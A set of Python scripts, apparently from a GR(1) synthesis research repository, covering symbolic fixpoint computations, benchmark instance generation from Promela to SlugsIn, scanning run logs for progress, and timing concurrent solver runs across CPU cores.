q &= step(q, aut)
q &= stay
q |= escape
assert q <= qold
assert q <= (stay | escape)
return q
def attractor(target, aut):
"""Least fixpoint."""
assert scope.is_state_predicate(target)
qold = None
q = target
while q != qold:
qold = q
q |= step(q, aut)
assert q >= qold
assert q >= target
return q
def step(target, aut):
"""Return controllable predecessors."""
vrs = aut.vars_of_all_players
u = aut.replace_with_primed(vrs, target)
# /\ SysNext
# /\ EnvNext => Target'
u |= ~ aut.action['env']
u &= aut.action['sys']
# \E sys_vars': \A env_vars'
u = aut.forall(aut.varlist['env_p'], u)
u = aut.exist(aut.varlist['sys_p'], u)
return u
``` |
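The symbolic `attractor` and `trap` above iterate BDD predicates to a fixpoint. For intuition, the same least-fixpoint structure over an explicit state set looks like this; `pre` is a placeholder for the one-step controllable-predecessor operator that `step` implements symbolically:

```python
def attractor_explicit(target, pre):
    """Least fixpoint of  q  |->  target | pre(q)  over explicit state sets."""
    q = set(target)
    qold = None
    while q != qold:
        qold = set(q)
        q |= pre(q)
    return q
```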
{
"source": "johnyf/gr1experiments",
"score": 3
} |
#### File: examples/bunny/make_instances.py
```python
import argparse
import pprint
import logging
import re
from tugs import utils
log = logging.getLogger(__name__)
INPUT_FILE = 'bunny.pml'
PROMELA_PATH = 'pml/bunny_{i}.txt'
SLUGSIN_PATH = 'slugsin/bunny_{i}.txt'
N = 2
M = 17
def dump_promela(n, m):
"""Dump instances of Promela."""
for i in xrange(n, m):
code = make_promela(i)
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'w') as f:
f.write(code)
log.info('dumped Promela for {i} masters'.format(i=i))
def dump_slugsin(n, m):
for i in xrange(n, m):
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'r') as f:
pml_code = f.read()
slugsin_code = utils.translate_promela_to_slugsin(pml_code)
slugsin_file = SLUGSIN_PATH.format(i=i)
with open(slugsin_file, 'w') as f:
f.write(slugsin_code)
log.info('dumped SlugsIn for {i} masters'.format(i=i))
def make_promela(n):
"""Return Promela code for instance with size `n`."""
fname = INPUT_FILE
with open(fname, 'r') as f:
s = f.read()
# set number of cells
newline = '#define H {n}'.format(n=n)
code = re.sub('#define H.*', newline, s)
newline = '#define W {m}'.format(m=n-1)
code = re.sub('#define W.*', newline, code)
# add multiple weak fairness assumptions
# code += form_progress(n)
return code
def form_progress(n):
"""Return conjunction of LTL formulae for progress."""
prog = ' && '.join(
'[]<>(request[{k}] -> (master == {k}))'.format(k=k)
for k in xrange(n))
return 'assert ltl { ' + prog + ' }'
def main():
# log
fh = logging.FileHandler('code_generator_log.txt', mode='w')
log.addHandler(fh)
log.setLevel(logging.DEBUG)
# tugs log
log1 = logging.getLogger('tugs.utils')
log1.addHandler(fh)
log1.setLevel(logging.DEBUG)
# record env
versions = utils.snapshot_versions()
log.info(pprint.pformat(versions))
# args
p = argparse.ArgumentParser()
p.add_argument('--min', default=N, type=int,
help='from this # of masters')
p.add_argument('--max', default=M, type=int,
help='to this # of masters')
# p.add_argument('--debug', type=int, default=logging.ERROR,
# help='python logging level')
args = p.parse_args()
n = args.min
m = args.max + 1
dump_promela(n, m)
dump_slugsin(n, m)
if __name__ == '__main__':
main()
```
#### File: examples/cinderella/pml_to_slugsin.py
```python
import argparse
from tugs import utils
def dump_slugsin():
p = argparse.ArgumentParser()
p.add_argument('source', type=str,
help='input file')
p.add_argument('target', type=str,
help='output file')
args = p.parse_args()
with open(args.source, 'r') as f:
pml_code = f.read()
slugsin_code = utils.translate_promela_to_slugsin(pml_code)
with open(args.target, 'w') as f:
f.write(slugsin_code)
if __name__ == '__main__':
dump_slugsin()
```
#### File: gr1experiments/examples/cp_plots.py
```python
import os
import shutil
def main():
path = './synt15/'
fig_fname = 'stats.pdf'
destination = 'all_plots'
for root, dirs, files in os.walk(path):
for f in files:
if f != fig_fname:
continue
_, tail = os.path.split(root)
fname = tail + '.pdf'
a = os.path.join(root, f)
b = os.path.join(path, destination, fname)
print(a, b)
shutil.copy(a, b)
if __name__ == '__main__':
main()
```
#### File: gr1experiments/examples/digest.py
```python
import datetime
import os
import psutil
from tugs import utils
def scan():
paths = [
'./genbuf/runs',
'./genbuf/runs_slugs']
for path in paths:
scan_directory(path)
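# A run is "incomplete" when its details_* log lacks the final
# `make_transducer_end` entry; it counts as still running if some process
# holds the log file open, and as dead (killed) otherwise.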
def scan_directory(path):
logname = 'details_'
incomplete_files = list()
for root, dirs, files in os.walk(path):
for f in files:
if f.startswith(logname):
file_path = os.path.join(root, f)
file_path = os.path.abspath(file_path)
data = utils.load_log_file(file_path)
if 'make_transducer_end' in data:
continue
# still running or killed
incomplete_files.append(file_path)
open_files_by = find_file_pids(incomplete_files)
for f, name, pid in open_files_by:
print(f, name, pid)
print_progress(f)
print('\n')
open_files = [f for f, _, _ in open_files_by]
dead_files = [
f for f in incomplete_files
if f not in open_files]
print('dead files:')
for f in dead_files:
print(f)
def find_file_pids(files):
open_files_by = list()
for p in psutil.process_iter():
try:
flist = p.open_files()
pid = p.pid
name = p.name()
except (psutil.NoSuchProcess, psutil.AccessDenied):
continue
if not flist:
continue
for path, _ in flist:
if path not in files:
continue
open_files_by.append((path, name, pid))
return open_files_by
def print_progress(f):
data = utils.load_log_file(f)
if 'winning_set_start' in data:
print('started win set')
t0 = data['winning_set_start']['time'][0]
date = datetime.datetime.fromtimestamp(t0)
s = date.strftime('%Y-%m-%d %H:%M:%S')
print('win set start at: {s}'.format(s=s))
if 'winning_set_end' in data:
print('finished win set')
t1 = data['winning_set_end']['time'][0]
t_win = t1 - t0
print('win set time: {t:1.2f} sec'.format(t=t_win))
date = datetime.datetime.fromtimestamp(t1)
s = date.strftime('%Y-%m-%d %H:%M:%S')
print('win set end at: {s}'.format(s=s))
if 'make_transducer_start' in data:
print('started making transducer')
if 'make_transducer_end' in data:
print('finished making transducer')
if __name__ == '__main__':
scan()
```
#### File: gr1experiments/examples/interfere.py
```python
import argparse
import datetime
import pprint
import logging
import multiprocessing as mp
import sys
import time
import psutil
from tugs import solver
from tugs import utils
import matplotlib as mpl
mpl.use('Agg')
from matplotlib import pyplot as plt
GB = 2**30
GR1X_LOG = 'tugs.solver'
def run_parallel():
"""Run concurrent instances, increasing their number."""
print('run increasingly larger groups of instances.')
problem = 'synt15'
output = 'runs_testing'
target = run_gr1x
slugsin_file = '{problem}/slugsin/{problem}_20.txt'.format(
problem=problem)
details_file = '{problem}/{output}/details_{s}.txt'.format(
problem=problem, output=output, s='{n}_{cpu}')
strategy_file = '{problem}/{output}/strategy.txt'.format(
problem=problem, output=output)
n_cpus = psutil.cpu_count(logical=False)
print('{n_cpus} physical CPUs'.format(n_cpus=n_cpus))
n_cpus = psutil.cpu_count(logical=True)
print('{n_cpus} logical CPUs'.format(n_cpus=n_cpus))
for n in xrange(1, n_cpus + 1):
print('trying {n} CPUs'.format(n=n))
procs = list()
for cpu in xrange(n):
d = dict(
affinity=[cpu],
slugsin_file=slugsin_file,
details_file=details_file.format(n=n, cpu=cpu),
strategy_file=strategy_file)
p = mp.Process(target=target, kwargs=d)
procs.append(p)
for p in procs:
p.start()
for p in procs:
p.join()
print('all joined')
def run_gr1x(slugsin_file, strategy_file,
details_file, affinity=None, **kw):
"""Run `gr1x` instance with given affinity."""
win_set_file = 'winning_set'
proc = psutil.Process()
proc.cpu_affinity(affinity)
# log verbosity
level = logging.INFO
log = logging.getLogger(GR1X_LOG)
log.setLevel(level)
# dump log
h = logging.FileHandler(details_file, mode='w')
log.addHandler(h)
# capture execution environment
versions = utils.snapshot_versions(check=False)
log.info(pprint.pformat(versions))
# synthesize
with open(slugsin_file, 'r') as f:
s = f.read()
t0 = time.time()
solver.solve_game(
s,
win_set_fname=win_set_file,
strategy_fname=strategy_file,
max_memory=1 * GB)
t1 = time.time()
dt = datetime.timedelta(seconds=t1 - t0)
print('Done with: {fname} in {dt}'.format(
fname=slugsin_file, dt=dt))
# close log file
log.removeHandler(h)
h.close()
sys.stdout.flush()
def plot_saturation():
"""Plot time versus number of processors active."""
print('plot saturating effect')
fig_fname = 'cpu_saturation.pdf'
problem = 'synt15'
output = 'runs_testing'
details_file = '{problem}/{output}/details_{s}.txt'.format(
problem=problem, output=output, s='{n}_{cpu}')
fig = plt.figure()
fig.set_size_inches(5, 10)
total_time = dict()
n_cpus = psutil.cpu_count(logical=True)
cpus = range(1, n_cpus + 1)
for n in cpus:
print('load data of {n} CPUs'.format(n=n))
times = list()
for cpu in xrange(n):
fname = details_file.format(n=n, cpu=cpu)
data = utils.load_log_file(fname)
t0 = data['parse_slugsin']['time'][0]
t1 = data['make_transducer_end']['time'][0]
t = t1 - t0
times.append(t)
total_time[n] = times
plt.plot([n] * len(times), times, 'bo')
plt.xlabel('number of logical cores used')
plt.ylabel('Time (sec)')
plt.grid(True)
plt.savefig(fig_fname, bbox_inches='tight')
if __name__ == '__main__':
p = argparse.ArgumentParser()
p.add_argument('--run', action='store_true',
help='run instances and log measurements')
args = p.parse_args()
if args.run:
run_parallel()
plot_saturation()
```
#### File: examples/jcss12/make_instances.py
```python
import argparse
import pprint
import logging
from tugs import utils
import amba_generator
log = logging.getLogger(__name__)
PROMELA_PATH = 'pml/jcss12_{i}.txt'
SLUGSIN_PATH = 'slugsin/jcss12_{i}.txt'
N = 2
M = 17
def dump_promela(n, m):
"""Dump instances as Promela."""
for i in xrange(n, m):
code = amba_generator.generate_spec(i, use_ba=False)
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'w') as f:
f.write(code)
log.info('dumped Promela for {i} masters'.format(i=i))
def dump_slugsin(n, m):
"""Dump instances as SlugsIn."""
for i in xrange(n, m):
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'r') as f:
pml_code = f.read()
slugsin_code = utils.translate_promela_to_slugsin(pml_code)
slugsin_file = SLUGSIN_PATH.format(i=i)
with open(slugsin_file, 'w') as f:
f.write(slugsin_code)
log.info('dumped SlugsIn for {i} masters'.format(i=i))
def main():
# log
fh = logging.FileHandler('code_generator_log.txt', mode='w')
log.addHandler(fh)
log.setLevel(logging.DEBUG)
# tugs log
log1 = logging.getLogger('tugs.utils')
log1.addHandler(fh)
log1.setLevel(logging.DEBUG)
# record env
versions = utils.snapshot_versions()
log.info(pprint.pformat(versions))
# args
p = argparse.ArgumentParser()
p.add_argument('--min', default=N, type=int,
help='from this # of masters')
p.add_argument('--max', default=M, type=int,
help='to this # of masters')
# p.add_argument('--debug', type=int, default=logging.ERROR,
# help='python logging level')
args = p.parse_args()
n = args.min
m = args.max + 1
dump_promela(n, m)
dump_slugsin(n, m)
if __name__ == '__main__':
main()
``` |